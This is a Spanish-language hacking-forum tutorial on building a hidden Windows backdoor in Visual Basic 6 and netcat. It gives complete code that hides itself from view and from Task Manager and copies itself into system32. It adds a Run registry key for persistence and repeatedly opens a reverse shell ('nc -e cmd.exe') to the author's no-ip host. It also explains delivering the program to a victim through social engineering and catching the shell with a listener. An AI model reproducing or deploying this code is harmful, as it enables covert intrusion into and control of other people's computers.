Autor
De antemano al tutorial , doy aviso , que és necesario utilizar la ingenieria social.-
Indice :
1)Introducción.-
2)Creando las aplicaciones & Registrando un no-ip.-
3)Ingenieria social.-
4)Dejando puerto a la escucha , para la conexion del netcat.-
Intruducción
Antes que todo , quiero advertir,que deben tener primero que todo un poco de conocimientos de los que és msdos , ya que no sabran que hacer luego de obtener la shell remota , Tambien viene bien, un poco de conocimientos de como usar el netcat , y tambien de visualbasic,eso facilitaria la tarea.
Este manual , no esta basado en linux,si no que esta echo para los que trabajan en windows.
Al final del manual ,dejare referencias,de tutoriales de netcat,visualbasic,No-ip,msdos,que pueden servir.-
Armandonos con las herramientas :
0x01: Necesitamos el nc.exe .
Acá tienen la descarga directa.
Descarga nc
El nc.exe ,lo pondremos en la ruta Windows/system32.-
-~-
Después, para compilar , nuestro proyecto,que va a hacer la asaña , necesitamos el visualbasic 6.0 , mejor si tienen el visual studio,pero tranquilamente pueden usar uno portable,busquen bien , porque muchos de los portables,no andan con eficiencia, y casi siempre fallan , al compilar.-
Aclaración : Nuestra aplicación, va a ser indetectable,por cualquier antivirus.-
Pues esto es todo lo que necesitamos,empezemos.-
Creando archivo visualbasic.
abrimos el visualbasic, y creamos un proyecto de tipo standar EXE
Colocamos un timer , en el proyecto.
Buscan la propiedad enabled y la cambian por false.-
Bueno , en el form load del proyecto , ponemos el siguiente codigo.-
Código:
Private Sub Form_Load()
Timer1.Interval = 1000 ' Ajustamos el tiempo del timer en MS.
Form1.Visible = False ' Ocultamos la ventana del formulario
Timer1.Enabled = True ' Activamos el timer.
FileCopy App.Path & "\nc.exe", Environ("systemroot") & "\system32\nc.exe" 'Copiamos el nc , que va a estar en la carpeta del proyecto a system32.
FileCopy App.Path & "\proyectod.exe", Environ("systemroot") & "\system32\proyectod.exe"
' Copiamos el proyecto que va a conectar a nuestro netcat luego del reinicio del 'ordenador.
Shell Environ("comspec") & " /c Reg Add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v c:\windows\system32\proyectod.exe /t REG_SZ /f"
Shell Environ("comspec") & " /c Reg Add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v d:\windows\system32\proyectod.exe /t REG_SZ /f"
'Aqui hacmos las entradas al registro , para que se autoinicie proyectod.exe,que vamos a crear a continuación.-
Form1.Hide ' Ocultamos form
App.TaskVisible = False ' Hacemos invisible la aplicacion en el administrador de tareas.
End Sub
En el timer ,ponemos lo siguiente.-
Código:
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe NOIP 5555"), vbHide
End Sub
Referencias NO-IP : Aqui va, nuestra no-ip,que remplazara a nuestra ip , con un conjunto de letras que identificaran nuestra ip , para que cuando cambie nuestra ip ,no se nos joda la aplicación,para esto , vamos a no-ip.com , nos registramos y aderimos un host que sustituya tu ip , si no sabeis como crear un no-ip , visita las referencias que dejo al final del tutorial.-
Yo ya tengo mi no-ip , que es framework.sytes.net,que en este caso , el codigo del timer quedaria asi.
Código:
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
' Establecemos conexion con nuestro pc , a travez del no-ip y el puerto 5555
'Con el vbhide,ocultamos la ventana del msdos.-
End Sub
Nuestro primer proyecto terminado quedaria algo parecido a esto.-
Código:
Private Sub Form_Load()
Timer1.Interval = 1200
Form1.Visible = False
Timer1.Enabled = True
FileCopy App.Path & "\nc.exe", Environ("systemroot") & "\system32\nc.exe"
FileCopy App.Path & "\proyectod.exe", Environ("systemroot") & "\system32\proyectod.exe"
Shell Environ("comspec") & " /c Reg Add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v c:\windows\system32\proyectod.exe /t REG_SZ /f"
Shell Environ("comspec") & " /c Reg Add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v d:\windows\system32\proyectod.exe /t REG_SZ /f"
Form1.Hide
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
End Sub
Cambian mi no-ip , por el suyo. okok ! vamos a crear el proyectod.exe
abrimos un nuevo proyecto standar .exe, ponemos un timer en el proyecto y en el codigo ponemos lo siguiente :
Código:
Private Sub Form_Load()
Timer1.Interval = 1200
Form1.Visible = False
Timer1.Enabled = True
Form1.Hide
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
End Sub
Compilamos los 2 proyectos, el primero lo guardamos con el nombre que querramos , el segundo , como proyectod.exe
Bien,hacemos una carpeta, y metemos todo ahi adentro , y ponemos el nc.exe adentro de esa carpeta.-
Quedaría algo así. :
Ok, eso lo ponemos en un .rar y esta listo para enviar.-
3)Ahora viene lo que es ingenieria social, teneis que hacer que tu
Una vez que habra abrir.exe, ya esta infectado podemos obtener shell remota de la siguiente forma..
4)Dejando puerto a la escucha.
Vamos a inicio->ejecutar->cmd
ponemos el siguiente comando ...
nc -l -p 5555 y damos enter.-
* Yo puse en la imagen , 7500 , porque es el puerto que uso.-
Ahora, cuando tienen esta shell,se les pueden venir mil cosas por la cabeza, si saben usar el msdos ,o saben programación en batch, pues si no saben como usar esta shell , lean las referencias , y luego sabran.-
Referencias :
Creando una no-ip :
http://www.gamerzlove.com/f54/guia-como-crear-un-no-ip-129455/
Tutorial de visualbasic :
http://www.elguruprogramador.com.ar/tutoriales/visual-basic
Tutorial netcat para noobs.
http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html
La programación en entorno msdos y batch.
http://www.elhacker.net/ProgramacionBat.htm
Mi despedida :
Bueno,espero que les guste,cualquier duda,critica,advertencia,amenaza en este topico , o bien un MP.
Me despido att : MagoMagico
En línea
